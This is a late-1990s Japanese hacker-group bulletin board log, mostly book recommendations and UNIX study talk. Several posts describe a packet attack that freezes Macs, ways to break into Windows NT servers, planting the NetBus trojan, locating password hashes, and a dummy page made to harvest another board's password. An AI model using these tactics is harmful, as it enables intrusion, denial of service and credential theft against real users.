| 【メッセージ】 「たのしいUNIX」を読んでいて思ったのですが、 tarでまとめられたファイルって、IDで所有者を記憶してますよね。 BSDでは、ファイルはtarコマンドでツリー構造へのコピー(復元)を行った ユーザ(ID)の所有物となって、問題ないような気がしますが、 System Vでは-oを付けないと、tarでまとめたユーザ(ID)の所有物になるとのこと。 となると、自分のrootでまとめたファイルをほかのSystem Vで復元すると、 そこのrootの所有物になるってことですか? それってもしかして・・・ なんだか私でさえ気づくような疑問なので、 「何だ、またか・・・」と思うような質問かもしれませんが、 少し気になったので教えていただけないでしょうか。 PS. 続編の「続・たのしいUNIX」も買いましたが、二つともためになる本です。 いい本を紹介してくれてありがとです。>うにゅんさん |
| 【名 前】Hariru 【タイトル】本 02/19 11:20 |
hariru@ami.602.cc |
| 【メッセージ】 お薦めってわけじゃありませんけど、一応。 「暗号のすべてがわかる本」:** 暗号を幅広く知るために役立ちます。読みやすく結構面白いです。 「実用UNIXハンドブック」:*** ちょっとしたUNIXに関する知識、 コマンドに対する使用可能なUNIX一覧を知りたい場合とか、 結構役立ちそうです。<買ってすぐなので憶測 「通信プロトコル事典」:**** ネットワーク全般をほぼカバーして、かなり詳しく書いてあると思います。 ただMD5(RFC1321)の説明にわかりやすい間違いが・・・(笑) 「UNIXネットワークプログラミング」:????? 同じく持ってます。しかし、全く読んでません。(汗) この休みを利用し、根性入れて読もうかと思っていましたが、 RZさんの話では難しいとか・・・。 ま、また次の機会にしよ。(大汗) 実はここにあげた本、ほとんど読んでいないんですよね。 そんなわけで、評価(*の数)はかなりテキトーです。 |
| 【名 前】HIRO_MU 【タイトル】私のお勧め本 02/19 05:35 |
hiro_mu@digicron.com |
| 【メッセージ】 「人間の由来(上・下)」 河合雅雄著 小学館 これを読めば、TCP/IPで構成されるサイバースペースの 全てを立体的に把握できるようになる、らしい(謎)。 というか、Club AIC Mail Magazineの創刊号、成り行きで私が 担当することになりました。 みんな、登録して下さい。(苦笑) はっきり言って、私が担当する週は面白くないです。 だけど、Yagiさんが書く週は木馬を自作するといったような こともやる予定ということですので、まあ、そこらのMLよりかは ためになるのではないでしょうか。 http://ya.x0.com/~clubaic/mm.html よろしく〜〜〜。 |
| 【名 前】ぽとぴん 【タイトル】オライリーは 02/19 00:52 |
|
| 【メッセージ】 全体的に買いだよね。 特にFWのやつ、あれはよい。 最近TCP/IPの本がでたらしい。。 SNMPのパケットについてかなり詳しく書いている本ないかなー |
| 【名 前】Rorrim 【タイトル】私のお勧め本 02/18 23:40 |
49hack@usa.net |
| 【メッセージ】 ASCII出版:「C言語入門〜改訂第3版〜」 アカデミ〜はこれを見ながら書いていたりします。 オーム社:「UNIXネットワークの日々」「スーパーユーザの日々」 「Mail&Newsの日々」:水越賢治著 読みやすいので結構気に入ってます。 でも基本って言うか入門書ですね。 |
| 【名 前】UNYUN 【タイトル】re:(3)おすすめ本 02/18 01:04 |
unewn4th@usa.net |
| 【メッセージ】 >あの、BOOK REVIEWみたいなページを書いたんですけど。 >ちょっと前に。まだ少ないですけど。 知ってますよ〜 O'REILLY本はいいですよね。っていうか、いい本はみんな訳本 ってのが悲しいような... 私もいっぱい持ってますけど、そん中でO'REILLY本を紹介します。 あとは、Penguin Referenceで。 「ファイアウォール構築・インターネットセキュリティ」 一応ファイアウォール構築ガイドだけど、Adminのための ネットワークセキュリティの総合読本とも言える。 セキュリティに対する「心構え」についての記述も多く、 なんか楽しい(笑) 「TCP/IPネットワーク管理」 Adminのための、ネットワーク環境設定・管理のためのガイド本。 BIND構成、sendnailの設定ではお世話になりました。 「C++実践プログラミング」 適当なC++本読んで、UNIXでC++やって、いい気になってMFCへ。 分かってたつもりが、あっさり打ちのめされて(笑)、 ダークな気分になってたとき、この本でなんとか打開しました。 C++を本気でやりたい人は、VC++をインストールする前に UNIX-gccとこの本で勉強するのが吉でしょう。 |
| 【名 前】reverse 【タイトル】re:(2)おすすめ本 02/17 23:32 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 >一応、各方面の簡単な入門書からイカす技術書まで、みなさん あの、BOOK REVIEWみたいなページを書いたんですけど。 ちょっと前に。まだ少ないですけど。 「UNIXシステム管理」とか普通っぽい本もあるんですけどね。 とりあえず。ていうかO REILLY本、集めてます。 |
| 【名 前】うにゅん 【タイトル】re:(1)OSまかせ 02/17 21:26 |
unewn4th@usa.net |
| 【メッセージ】 >チェックサムを0にしてOSに計算させたら100%NGになってた。 40byteのmallocで44byteのチェックサム計算してますけど、 OSまかせにすると... sendto内部でmalloc関連をやられてると仮定 *packetバッファに連続してメモリが確保される sendto内部で44byte分のチェックサム計算を行う packetバッファは40byteなので、sendtoでのmallocedバッファに食い込む ゴミの分まで計算 チェックサムエラー ってことじゃないでしょうか。 思いっきり推測ですけど。 でも、40byteのブロックの外までチェックサム計算してるので、 自前関数でも、ゴミを拾う場合がありますからねぇ。 >そういやIDとかも0にしたら勝手にきめやがるのね。 >この辺つかってなにかできそうだな。 おしゃれ2号、期待してます(爆) |
| 【名 前】RZ 【タイトル】OSまかせ 02/17 20:03 |
|
| 【メッセージ】 IPヘッダ関係で パラメータを0にするとOSが勝手に決めてくれるのですが チェックサムを0にしてOSに計算させたら100%NGになってた。 あ、おしゃれ関係の話なんだけど。 時前のルーチンだと50%。なんなんだか。。。 そういやIDとかも0にしたら勝手にきめやがるのね。 この辺つかってなにかできそうだな。 ところでその他のお勧め本だと、 西原理恵子の「できるかな」かな(笑) マンガです。 |
| 【名 前】UNYUN 【タイトル】re:(1)おすすめ本 02/17 18:58 |
unewn4th@usa.net |
| 【メッセージ】 >こういうお勧め本のリストをコンテンツにしてみるのはいかがでしょう? こりゃいいですね。 是非やりましょう。っていうか、私個人、みなさんがどんな本読んでる のか、かなり興味あります(笑) ちゅうことで、コンテンツ作ります。 (Penguin Referenceかな) 一応、各方面の簡単な入門書からイカす技術書まで、みなさん が持ってる本、コメントつけて教えてください。 >UNIXシステムコールハンドブック。 >UNIXネットワークプログラミング。 私も持ってますよー。 >manで調べたほうがはやいんだけどね。 私もmanが一番使用頻度高い(笑) お手軽だし詳しいし。 VC++でも、ヘルプが一番ですよね。困ったらMSDN頼みだけど... |
| 【名 前】RZ 【タイトル】おすすめ本 02/17 16:12 |
defcon0@ugtop.comhttp://www.ugtop.com/defcon0/index.htm |
| 【メッセージ】 私が持ってる本を紹介しときます。 UNIX標準ライブラリハンドブック、 UNIXシステムコールハンドブック。 この2つは手軽に関数の仕様がわかるので良い。 でも全然詳しい部分まで追求してないうえに間違いだらけ(笑) ちょっとしっている人じゃないとハマるかも。 引数と戻り値の長さとエラー値調べるのに使ってます。 manで調べたほうがはやいんだけどね。 インターネットを256倍使うための本。 一応インターネット全般の知識を得たい人は買うべし。 うちのサブオペお勧めの一冊。初心者向け。 HTMLタグ辞典(笑) これなかなか使える。 RFC事典。 英語がいやな人はどうぞ。 ただし内容が詳しいかというとそうでもないです。 RFCを探すには使えます。 実習C言語。 これはCの勉強をしたい人におすすめの一冊。 これだけを覚えていればCは完璧でしょう。あとは応用だし。 詳細TCP/IP。 パケットの詳細やTCPDUMPの結果や、やりとりなどを 具体的に表してあるのが特徴で、わかりやすい。 TCP/IPプロトコル徹底解析。 これも同じような感じで、同じくわかりやすい。 こっちの場合は値の意味とかまで詳しく載っている。 パケット関係ならこの2冊を押さえるのがよいでしょう。 UNIXネットワークプログラミング。 難しい(笑) しかもぶあつすぎて見にくい。 この本のよいところは、実際のソースコードがのっているほかに 例えばpingプログラムなどを例にあげて詳しく解説している点。 プログラミングをやる人には良い一冊になるでしょう。 それに最初の項目でUNIX-Cについても言及しているのがよい。 と、こんなかんじですか、とりあえず。 こういうお勧め本のリストをコンテンツにしてみるのはいかがでしょう?>うにゅんさん あとサイトの情報(BugTraq)とか。 |
| 【名 前】うにゅん 【タイトル】re:(1)Solaris 02/17 14:18 |
unewn4th@usa.net |
| 【メッセージ】 Hariruさん、なんか無理言っちゃってすいませんね〜 これを機にSolarisを... ってことで... Solaris7、私は2週間くらいで来たように思います。 |
| 【名 前】Hariru 【タイトル】Solaris 02/17 09:36 |
hariru@ami.602.cc |
| 【メッセージ】 Rorrimさん、Solarisの情報ありがとうです。 無学の英語に翻弄されながら、やっとOderできるとこまでいったら、 >Sun Software Shop Store is temporarily closed for maintenance and will be reopened >Tuesday, February 16th, at approximately 12:15 p.m. Pacific Standard Time. といわれちゃいました。 しかし、Pacific Standard Time(太平洋標準時間?)って、 日本の何時間前のことなんだろ。 う〜ん、もうそろそろよい時間かな。 それはそうと、Solaris届くのってかなり時間がかかりそうですね。 その間、UNYUNさんが薦めてくれた本「たのしいUNIX」 を買ってきましたので読むことにします。 |
| 【名 前】Rorrim 【タイトル】re:(5)現実逃避ついで 02/16 15:55 |
49hack@usa.net |
| 【メッセージ】 Solaris7_for_x86は「非商用」に限り$10で買えます。 私の場合、Shipping+Taxで全部で$36だったと思います。 ちなみに英語版です。 御参考までにURL http://www.sun.com/smi/Press/sunflash/9808/sunflash.980810.2.html 英語だけどがんばろ〜 |
| 【名 前】Hariru 【タイトル】re:(4)現実逃避ついで 02/16 08:48 |
hariru@ami.602.cc |
| 【メッセージ】 >あ、それと、一応Solarisで話を進めるのがいいかと思うのですが、 >どうでしょう? 持ってますか? 結論からいうと、持ってないです。 そんなわけで、至急手にいれるようにしますです。 でもSolarisって確か商用だったような・・・ な、なんだか最近出費がかさむ(苦) |
| 【名 前】reverse 【タイトル】re:(1)現実逃避ついで 02/15 23:06 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 > TCP/IP講座やってもいいですか? お。プロトコル解析班としては、捨て置けない話題ですね。 TCP/IPと言わずに、プロトコル全般で・・・ >マスタリングTCP/IP−入門編、インターネットワーク編、応用編− 応用編を持っていますが、買いの一冊ですね。 このような良い本はみんな海外の翻訳本なんですよね。 >卒論 書いてません。物理系の工学部でしたけど。先生が入院したりして ^^; |
| 【名 前】UNYUN 【タイトル】re:(3)現実逃避ついで 02/15 16:46 |
unewn4th@usa.net |
| 【メッセージ】 >は〜い。ヘルプ可です。 >ただUNIXの全体像(基礎)すらわかってない状態なので、 >早めに取りかかれそうというのはUNIX基礎講座ぐらいかな。 おぉ、じゃ、UNIX基礎講座の担当はHariruさんってことでお願いします。 >何かおすすめの本っていうのがありましたら、教えてもらえませんか。 >まずはそういう本から勉強しようと思いますので。 うーん、Admin系なら、やっぱNUTSHELLの「UNIXシステム管理入門」でしょうか。 基礎的なヤツなら、ASCIIの「たのしいUNIX」がいいんじゃないかと... でも、最強はやっぱmanですね。本開けなくていいですし(笑) あ、それと、一応Solarisで話を進めるのがいいかと思うのですが、 どうでしょう? 持ってますか? |
| 【名 前】UNYUN 【タイトル】re:(1)おしゃれさん 02/15 16:18 |
unewn4th@usa.net |
| 【メッセージ】 >最近下火のおしゃれ関係ですが(笑)、nessusに載ってましたね 見ましたよ。うわお、出てるよ〜って(笑) なーんか、いいなぁ... 私が見つけた穴なんて、特殊アプリのだけなんでexploit とか作ってみたりしますけど、あんまり意味ないっす(泣) >今、マック用のおしゃれパケットを開発中です。 >こないだ打ち込んだマックは完全にフリーズしてました。コワイですね。 これ、例の「おしゃれ+」ですね〜(謎) やっぱ越えちゃうんですか? だとしたら、マジコワですよ。 デザイン会社とか、倒産に追い込めるかも(笑) |
| 【名 前】Hariru 【タイトル】re:(2)現実逃避ついで 02/15 11:49 |
hariru@ami.602.cc |
| 【メッセージ】 >ヘルプしてもいいってヒト、お願いします。> PenguinMembers は〜い。ヘルプ可です。 ただUNIXの全体像(基礎)すらわかってない状態なので、 早めに取りかかれそうというのはUNIX基礎講座ぐらいかな。 でも、そういう関係の本すら持っていないので、 これから買わなくてはなりません。 何かおすすめの本っていうのがありましたら、教えてもらえませんか。 まずはそういう本から勉強しようと思いますので。 <卒論のこと> うっへぇ〜、みなさん結構ラクしてますね。 私なんか3人のグループだったけど、 論文103ページの8割を書いて、しかも研究内容は全て私がしたんですよ〜。 卒論発表用の原稿すら9割も・・・。 はあ〜、よく考えると私ってそうとう馬鹿やってますね〜(笑) まあ、多少のスキルアップになってよかったとは思いますが。 |
| 【名 前】RZ 【タイトル】おしゃれさん 02/15 06:51 |
http://www.ugtop.com/defcon0/index.htm |
| 【メッセージ】 最近下火のおしゃれ関係ですが(笑)、nessusに載ってましたね あれ結局リモートのジャンルからはずれてるのに、いいのかな。 多分実装っていうか概念的に簡単だから数あわせの為にのせたんだろうなー 今、マック用のおしゃれパケットを開発中です。 こないだ打ち込んだマックは完全にフリーズしてました。コワイですね。 ところでOverDropの話とかちらちらでましたけど、 あれを何故みんな使わないか謎です。 フラグメントとアレとかコレとかをつけたパケットおくったら ircでは無敵です。 |
| 【名 前】UNYUN 【タイトル】re:(2)見っけ 02/15 00:51 |
unewn4th@usa.net |
| 【メッセージ】 >思わずゲームなんかしたりして... >間に合わん、もういや、留年したい... わははは。ウチの学部生も同じこと言ってますよー それと、17日提出なのに何故か研究室でゲームしてるようです(笑) 私は、いい加減なもので、卒論5日、修論4日でした(爆) 次のは3日で書く予定です。わーい。 |
| 【名 前】UNYUN 【タイトル】re:(1)現実逃避ついで 02/15 00:45 |
unewn4th@usa.net |
| 【メッセージ】 >ペンギンアカデミーのC言語講座が終わったら >TCP/IP講座やってもいいですか? これはいいですね。ぜひ、お願いします。 PenguinAcademyのコンテンツですけど、私も見なおし&増強を 考えてたとこです。 今のAcademyは「C言語で学ぶセキュリティ」しかないんで、 今のから予定の「セキュリティプログラミング1,2」を除いて、 「C言語基礎講座」にして、他にも「講座」を立てようかと... 1. C言語基礎講座 (by Rorrim) 2. TCP/IP基礎講座 (by Rorrim) 3. UNIX基礎講座 4. セキュリティプログラミング基礎講座 5. セキュリティ&Firewall導入講座 アカデミーのコンテンツとしては、こんな感じでしょうかねぇ。 どうでしょう? あ〜、でも量が多い... ヘルプしてもいいってヒト、お願いします。> PenguinMembers ってことで、Rorrimさん、残りのC言語基礎講座をパパーっと 片付けましょう。7,8あたりは私が書きましょうか? |
| 【名 前】Rorrim 【タイトル】現実逃避ついで 02/14 19:23 |
49-hack@ijk.com |
| 【メッセージ】 現実逃避ついでに... >うにゅんさん ペンギンアカデミーのC言語講座が終わったら TCP/IP講座やってもいいですか? 個人的にも勉強したいし、勉強するんなら公開したい方がいいだろうし。 オーム開発局 マスタリングTCP/IP−入門編、インターネットワーク編、応用編− この3冊の受け売りになりそうですけど... <卒論> なぜか突然「メド」がたった(ワーイ) しかも25ページでいいらしい。 かなりラッキー |
| 【名 前】Hariru 【タイトル】レス:見っけ 02/14 11:55 |
hariru@ami.602.cc |
| 【メッセージ】 UNYUNさん >暗号は無意味ですので、深く考えないでくださいね〜 あらら、そうなんですか。 以前どこかで似たような暗号を目にした気がしましたが、 そのたぐいのものだったのかな。 StLightさん >ピクっ・・・。 >いや、なんでもないでしゅ。 うっ、何か気になる・・・ Rorrimさん >間に合わん、もういや、留年したい... そういえば、私も何度か思いましたね〜 しかももう一年、時間的に優雅な学生生活を 楽しめるっていう魅惑付きですからね。 でも、親のすねかじってたのでそんなことになったら・・・(汗) まあ今が一番現実逃避したい時期でしょうけど、 頑張ってください。 |
| 【名 前】Rorrim 【タイトル】re:(1)見っけ 02/14 00:34 |
49-hack@ijk.com |
| 【メッセージ】 Hariru Wrote >卒論発表、引っ越しと終わって、やっと落ち着きました。 いいな〜、私は提出が19日なんで今死んでます。 思わずゲームなんかしたりして... 間に合わん、もういや、留年したい... |
| 【名 前】StLight 【タイトル】re:(2)見っけ 02/14 00:34 |
Suzume-Sakurajyousui@CyberTeam.vip.co.jphttp://base.oc.to/Lusteen_Carmine/ |
| 【メッセージ】 >某掲示板のパス ピクっ・・・。 いや、なんでもないでしゅ。 |
| 【名 前】UNYUN 【タイトル】re:(1)見っけ 02/13 22:06 |
unewn4th@usa.net |
| 【メッセージ】 >大文字と小文字が交互になっている暗号を >base.oc.toの方で見つけたのですが あー... あれは、ウソモノです(笑) 以前、某掲示板のパスをGETするために作ったダミーページです(爆) 暗号は無意味ですので、深く考えないでくださいね〜 |
| 【名 前】reverse 【タイトル】re:(2)NT 02/13 21:51 |
esrever@usa.net |
| 【メッセージ】 > ここら辺はわからないので自分なりにちょっと調べてみます(^^; ISSなんか面白いですよ。ローカルスキャンのみですが、 security情報が詳しく載ってるので読むと参考になります。 >場所が変わっていて特定できませんでした。(;_; SECURITY\SAM\DOMAINS\ACCOUNT\USERS\ にあるのがハッシュ値じゃないですか? デフォだとsystemユーザーしかread権限が無いのです。 >SendBoys使ってもやはり解読できませんでした。(^^; って出るんですよね ^^; まあ、ロフトクラックがありますし。 |
| 【名 前】Hariru 【タイトル】見っけ 02/13 21:30 |
hariru@ami.602.cc |
| 【メッセージ】 卒論発表、引っ越しと終わって、やっと落ち着きました。 でも、引っ越した先ではテレホが使えない・・・(涙) まあ、それもしばらくの間だし、 今まで集めた情報の検証とかするいい機会かな。 ところでうにゅんさん、 大文字と小文字が交互になっている暗号を base.oc.toの方で見つけたのですが、 この暗号の法則って教えてもらえませんか。 少し調べてみたんですがよくわからないです。 それと、もう一つのヒントは掲示板でってことですけど、 このヒントはいったい・・・ |
| 【名 前】HAE 【タイトル】re:(1)NT 02/13 21:10 |
puyoo@geocities.co.jp |
| 【メッセージ】 > 有名なのはPPTP(Point-to-Point TunnelingProtocol)を使った > バーチャルプライベートネットワーク(VPN)のバグを突いたもの。 > .aspプログラムへのrootログイン。 > IIS(インターネットインフォメーションサーバー)をいれているなら > WEB上から悪意のプログラムを実行する事も可能です。 ここら辺はわからないので自分なりにちょっと調べてみます(^^; > パスワード設定してなかったりデフォルト設定だったりするので > 以外と簡単にログインできるかも。このへんはUNIXと同じですね。 > 悪意のプログラムを転送して実行させてしまえば極めて高い権限が > 与えられる事もあります。 WIN-NTはパスワード情報はどこに書かれているのでしょうか? やっぱレジストリでしょうか? 試しに遊びで入れた自分のNTでレジストリの変化調べたら結構いろんな 場所が変わっていて特定できませんでした。(;_; NETBUSも仕掛けてあるんですけど、キーボートキャプチャしてもログイン画面 (ロック解除画面)の文字はキャプチャできませんでした。 SendBoys使ってもやはり解読できませんでした。(^^; |
| 【名 前】reverse 【タイトル】re:(1)ちなみに 02/12 19:04 |
esreverhttp://members.tripod.com/~reverse/ |
| 【メッセージ】 金がなくてDECにできなくてcompaq。 システムはすべて2重化されていて、 監視ツールでOpen View使ってたりするかも。 |
| 【名 前】k00L 【タイトル】ちなみに 02/12 13:59 |
webmaster@backsection.comhttp://backsection.com |
| 【メッセージ】 某MS日本支店(笑)のサーバーは Penpro200MHzのツインでHDはメモリは80M。 HDは一応RAIDで組んでますね。 ファイルサーバーは2機あってMSの全ソフトが入ってます(笑) |
| 【名 前】k00L 【タイトル】NT 02/12 13:41 |
webmaster@backsection.comhttp://backsection.com |
| 【メッセージ】 >ゲイツに汚染されてるWIN-NTがサーバーの場合も外部から進入して >全てコントロールすることができるのでしょうか? >TELNETとかいう概念もないみたいだし。(^^; もちろん可能です。 有名なのはPPTP(Point-to-Point TunnelingProtocol)を使った バーチャルプライベートネットワーク(VPN)のバグを突いたもの。 .aspプログラムへのrootログイン。 IIS(インターネットインフォメーションサーバー)をいれているなら WEB上から悪意のプログラムを実行する事も可能です。 外部接続するには「マイクロソフトネットワーク」を使って LAN接続(のような)する方法が一般的ではないでしょうか? 各サーバー上のHDへのアクセス権を「共有」にしていると 外部からHDの中のアプリを使うことができますし MSネットワークからadminアカウントでログインして(パスがわかれば) しまえばなんでもできますね。 あ・・ちなみにボクみたいな個人でNTserver使ってる人は パスワード設定してなかったりデフォルト設定だったりするので 以外と簡単にログインできるかも。このへんはUNIXと同じですね。 悪意のプログラムを転送して実行させてしまえば極めて高い権限が 与えられる事もあります。 本格的に運用してる人はデータベースにSQLserver使っている人が 多いと思いますので、ハクする場合これが使えないと話になりませんね。 実際やった事は無いので、仮定の話ですが(^^;; 間違ってたら指摘してください>識者の方 @うにゅん師 認証蹴られる原因がわかりました。 詳しくはメルにて。 |
| 【名 前】HAE 【タイトル】WIN-NT 02/12 11:17 |
puyoo@geocities.co.jp |
| 【メッセージ】 UNIX向けの攻略法はあちこちのページでよく見かけますが、 ゲイツに汚染されてるWIN-NTがサーバーの場合も外部から進入して 全てコントロールすることができるのでしょうか? TELNETとかいう概念もないみたいだし。(^^; やっぱり直接NTに触れてNETBUSでも入れておかなくちゃだめなんですか? |
| 【名 前】int ZER0 【タイトル】どうも、お久しぶりです 02/12 00:15 |
intzer0@usa.net |
| 【メッセージ】 久々のカキコになりました。 お休みしている間に新しいことがイロイロ起こっているようで ほとんどついていけないでし(T-T) (何かイミのあるようなことを書きたかったのですが..) まだしばらくはROMしていますです。 >うにゅん様 前のメールでは失礼しました。 どうか許してくださいまし |
| 【名 前】k00L 【タイトル】ふむ 02/11 14:13 |
webmaster@backsection.comhttp://backsection.com |
| 【メッセージ】 >んだかsocket使った瞬間にパーミッション落とすってのが流れのようですが、 >あれってどうやってトラップしてるんでしょうかね。 謎ですねー。 大体どうやってディレクトリまで特定するんですかね。 コンソールに警告出してるんでしょうか。 環境変数チェクしてるなら、ごまかせばばれないような気もするし Cとかで書いてもダメなんですかね。 いずれにしろアカがないんで試せません(笑) |
| 【名 前】Rorrim 【タイトル】おっしゃれ〜 02/11 01:51 |
49-hack@ijk.com |
| 【メッセージ】 >Reverseさん 結構笑えますね、特に 「This plugin implements the oshare attack」 ってとこが、RZさんの狙った通りの展開でしょうか?(笑) >Uyuwnさん 私のメールアドレス公開でおねがいします。49-hackの方で。 書くの忘れてたみたいですみませんでした。 最近ソーシャル気味なRorrimでした。 |
| 【名 前】reverse 【タイトル】oshare 02/11 01:08 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 あーしつこい性格です ^^; http://cvs.nessus.org/plugins_list.html free+open sourceなスキャンツールnessusがoshareに対応しているのを発見しました。 リスクがハイになってます。 ところでこれ、DoS攻撃を焦点においたツールみたいですね。 |
| 【名 前】うにゅん 【タイトル】members 02/10 18:19 |
unewn4th@usa.net |
| 【メッセージ】 Penguin Membersを追加しました。 ココのメンバー紹介です。 |
| 【名 前】Agent M 【タイトル】HyperMart 02/10 09:16 |
|
| 【メッセージ】 こんにちは。 > ハイパーなんかもsocket使った瞬間にアカ消されるようになりましたね。 なんだかsocket使った瞬間にパーミッション落とすってのが流れのようですが、 あれってどうやってトラップしてるんでしょうかね。 おまけにHyperMartはV氏の某連載で楽しい方法がスッパ抜かれてるし、 やはりCGIを解放するってのはコワイですね....。 |
| 【名 前】うにゅん 【タイトル】re:(1)挨拶でぷ。 02/10 01:30 |
unewn4th@usa.net |
| 【メッセージ】 お引っ越しおめでとー。 >いや、正直消されてもしょうがないほど危険だからね。 うーん、私としては、全く無害だと思ってるんですけど... だって、セキュリティ関連HPだしね。 消されたかな?って思ったときは、マジで「なんで?」 って思いましたよ〜。 |
| 【名 前】StLight 【タイトル】挨拶でぷ。 02/09 23:16 |
Suzume-Sakurajyousui@CyberTeam.vip.co.jphttp://base.oc.to/Lusteen_Carmine/ |
| 【メッセージ】 きゅ〜ん。 やっとこさ引っ越し完了したです。 ::UNYUNさん:: あ、復活したんですね、陰・・・じゃない、影ペンギン。 いや、正直消されてもしょうがないほど危険だからね。 うちなんか消されないからなんか悲しい(笑) 一回くらい消されたいっす〜。 なんてね、ウソウソ〜。と言うことでした。 ::K00Lしゃま:: 昨日、K00Lさんのメール、見事にすべて食らいました(笑) いや〜、痛かったです。でも私も痛い事しました〜。 詳しくはそちらへ。ごめんね〜(T-T) |
| 【名 前】k00L 【タイトル】直りましたね 02/09 15:06 |
webmaster@backsection.comhttp://backsection.com |
| 【メッセージ】 てっきりお茶目が見つかってアカ消されたのかと思いました(笑) ハイパーなんかもsocket使った瞬間にアカ消されるようになりましたね。 残念です。楽しかったのに(謎) 無料CGI鯖はセキュリティほぼゼロですね。 置いてる人注意ですよ。 @うにゅん師 >マジ?本気にしちゃうよ(水爆) 好みは?(汗) >あ、でもk00Lさんの数あるコレクションから、お一つ >みつくろってもらえるとうれしいな。ふぉりなー希望(謎) へ?なんのことでしか?(汗) ふぉりなー?? |
| 【名 前】うにゅん 【タイトル】re:(1)(´ヘ`)ハァ 02/09 14:39 |
unewn4th@usa.net |
| 【メッセージ】 >とっても期待してます。(はぁと) >お手数かけます。 いえ、こっちこそ遅れてすいませんです(反省) >○○○おごりますからね(核爆) マジ?本気にしちゃうよ(水爆) あ、でもk00Lさんの数あるコレクションから、お一つ みつくろってもらえるとうれしいな。ふぉりなー希望(謎) |
| 【名 前】うにゅん 【タイトル】おやややや? 02/09 14:35 |
unewn4th@usa.net |
| 【メッセージ】 なんで? fortune側が復活してる... 調子悪かっただけなのかなぁ。 お騒がせしました。 |
| 【名 前】k00L 【タイトル】(´ヘ`)ハァ 02/08 23:00 |
webmaster@backsection.comhttp://backsection.com |
| 【メッセージ】 @stlightさん >Baseに入れてもらいましたでし。 >今まで内容が薄かったから(今も 笑)蹴られてたの(ウソ) こ・・このっ・・うそつきっ(笑) @うにゅん師 >あ、そうだ。すんませんk00Lさん、アレもうちょいまってください。 >http://www.geocities.com/SiliconValley/Byte/5349/documents/howtobh.html >(Chomskyさんとこ) >にHow To Become A Hackerの和訳が出てて、これ読んでしまって >からまた書きなおし... とっても期待してます。(はぁと) お手数かけます。 ○○○おごりますからね(核爆) これは裏BBSネタだった(笑) |
| 【名 前】うにゅん 【タイトル】あれれれれ〜? 02/08 18:46 |
unewn4th@usa.net |
| 【メッセージ】 fortuneの影ペンギンが消えてる...(泣) アカ消されたんかい?と思ったら、何故かログインできる。 でも、ファイルは消えてるし、アップロードすると、 I'm afraid our server is a little busy at the moment and couldn't service your request. とか言われるし。 なんでだろう。 とりあえず、ココにリンク貼ってくれてる方は、お手数ですけど、 http://base.oc.to/skyscraper/byte/551/ に貼りなおしてくださいませ。 |
| 【名 前】うにゅん 【タイトル】re:(1)やっとこさ 02/08 03:04 |
unewn4th@usa.net |
| 【メッセージ】 >Baseに入れてもらいましたでし。 いらっしゃーい ネタ的には、backsection.zeroの方ですよね。 ところで、backsection.comのコンテンツは何か作りますか? あ、そうだ。すんませんk00Lさん、アレもうちょいまってください。 http://www.geocities.com/SiliconValley/Byte/5349/documents/howtobh.html (Chomskyさんとこ) にHow To Become A Hackerの和訳が出てて、これ読んでしまって からまた書きなおし... 以外に難しいもんです |
| 【名 前】うにゅん 【タイトル】re:(1)SelfIntroduction 02/08 02:45 |
unewn4th@usa.net |
| 【メッセージ】 >これでお願いします。 アップしときました。 あ〜、私も旧Info@yft軍団(笑)には、随分とお世話に なったものです。 |
| 【名 前】StLight 【タイトル】やっとこさ 02/08 00:35 |
Suzume-Sakurajyousui@CyberTeam.vip.co.jphttp://www.geocities.com/Vienna/Choir/3980/ |
| 【メッセージ】 %UNYUNさん% Baseに入れてもらいましたでし。 今まで内容が薄かったから(今も 笑)蹴られてたの(ウソ) ということで・・・報告でした。 %Rorrimさん% 私も尊敬してるでしよ。 きゅ〜ん。 ではではっ!(^-^)/~~~) |
| 【名 前】Rorrim 【タイトル】SelfIntroduction 02/07 05:42 |
49-hack@ijk.com |
| 【メッセージ】 え〜っと、どこに書くか悩んだ結果こちらに書かせてもらいます。 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 尊敬する人:ジョン・レノン、INFO@YFTで出会った多くの人たち 特にUyuwnさん、Bisqueさん、StLightさん、Kazutさん、Nightさん そして先輩の方々。 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− これでお願いします。 ID-Passなくしちゃったんで自己修復できませんでした。 ごめんなさい。 |
| 【名 前】sp00ky 【タイトル】ありがとうございます 02/06 23:37 |
|
| 【メッセージ】 れすありがとうございます 「*」いれるなんて天才・・・ というか私のレベルがひくいんですね。 掲示板のレベルをさげてしまいすいませんでした。 |
| 【名 前】うにゅん 【タイトル】re:(1)crypt-md5ドキュ 02/06 15:27 |
unewn4th@usa.net |
| 【メッセージ】 おぉ! できましたか。 早速アップしました。crypt-md5()は特にオススメですよ。っていうか、 crypt-md5関連の日本語Docで、詳しいのを読んだのは私は初めてです。 (MD5の詳細Docも少ないですけどね) johnのソースは読んでてアタマ痛くなりますね。 コメントほとんどなし、グローバル使いまくり、モジュール独立性なし... 「もう少し読みやすく書けんのかぁ!」って(苦笑)。 それとも、わざとか?(笑) |
| 【名 前】うにゅん 【タイトル】re:(1)あれ? 02/06 14:48 |
unewn4th@usa.net |
| 【メッセージ】 >うにゅんさん添付ファイル届きませんでしたか?(^^; あ、すいません報告するの忘れてました。 無事届いてます。 忙しくてまだ本格的に見てないんですけど、サラっと 見た感じ、wtmpとwtmpxのロギングにかなりズレがあるようで... 原因究明中です。 |
| 【名 前】Hariru 【タイトル】crypt-md5ドキュ 02/06 12:32 |
hariru@ami.602.cc |
| 【メッセージ】 うにゅんさ〜ん、MD5を使ったcryptのドキュができましたので メールで送っておきました〜 実はドキュメント自体は少し前にできていたのですが、 JohnのMD5アルゴリズムを使ったプログラムも付けようと思っていたのですが、 なぜだかうまくいかないです。 アルゴリズムはわかっているつもりなのに、どうして? う〜ん、まさかアルゴリズム自体にコピープロテクトがかかったりしていませんよね〜(笑) とりあえず、また一から考え直していこうと思いますが、 Johnのアルゴリズムを自作のプログラムに入れたって人っていますか? いたら、ヒントなど教えてくだしゃい。 あっ、ちなみに送ったドキュの方は、正しく動くことは確認済みです>うにゅんさん |
| 【名 前】HAE 【タイトル】あれ? 02/06 10:16 |
puyoo@geocities.co.jp |
| 【メッセージ】 うにゅんさん添付ファイル届きませんでしたか?(^^; 1階失敗して再送信したんですけど届いてなかったらもう1度メールします。 |
| 【名 前】四苦八苦 【タイトル】>うにゅんさん 02/06 01:55 |
|
